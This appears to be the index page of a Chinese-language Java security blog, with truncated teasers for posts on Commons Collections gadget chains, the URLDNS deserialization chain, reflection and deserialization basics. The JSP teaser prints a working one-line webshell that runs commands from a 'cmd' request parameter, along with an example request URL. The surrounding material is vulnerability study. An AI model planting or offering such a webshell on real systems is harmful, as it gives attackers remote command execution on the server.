java安全

CC链1

CC链,逃不掉的。 CC链1的漏洞版本在apache commons collections 3.21以下 。分为两条,一个TransformerMap链一个LazyMap链 Transformer Map 链 RCE原理 我在网上找到了一则利用代码,虽然这个利用代...

JAVA URLDNS链

看到这篇文章我不禁陷入深思,我五月上来就搞这个链,真的是痛苦不堪。现在开始重拾JAVA反序列化,根据P神的文章,先来一条简单的链:URLDNS。 URLDNS 这个链的主要作用是,可以通过反序列化的手段,...

JAVA反射及其相关安全问题

反射的基础 反射是java的一个特性,用于获取类的详细信息(方法,变量),并可以执行类中的方法。 获得一个类的类对象 要获取类的详细信息或执行其中的方法,首先肯定是要获取到那个类的类对象 方法...

JSP一句话木马

挖洞遇见些JSP站,JSP一句话木马还是得会吧 <%Runtime.getRuntime().exec(request.getParameter("cmd"));%> 无回显命令执行 http://127.0.0.1/shell.jsp?cmd=calc <%    if("023".equals(request.g...

Java反序列化

JAVA反序列化 1.如何实现序列化与反序列化 使用ObjectOutputStream和ObjectInputStream类与Serialize接口: ObjectOutputStram(对象输出流): 用于序列化,将对象已二进制格式进行写入 ObjectInputStre...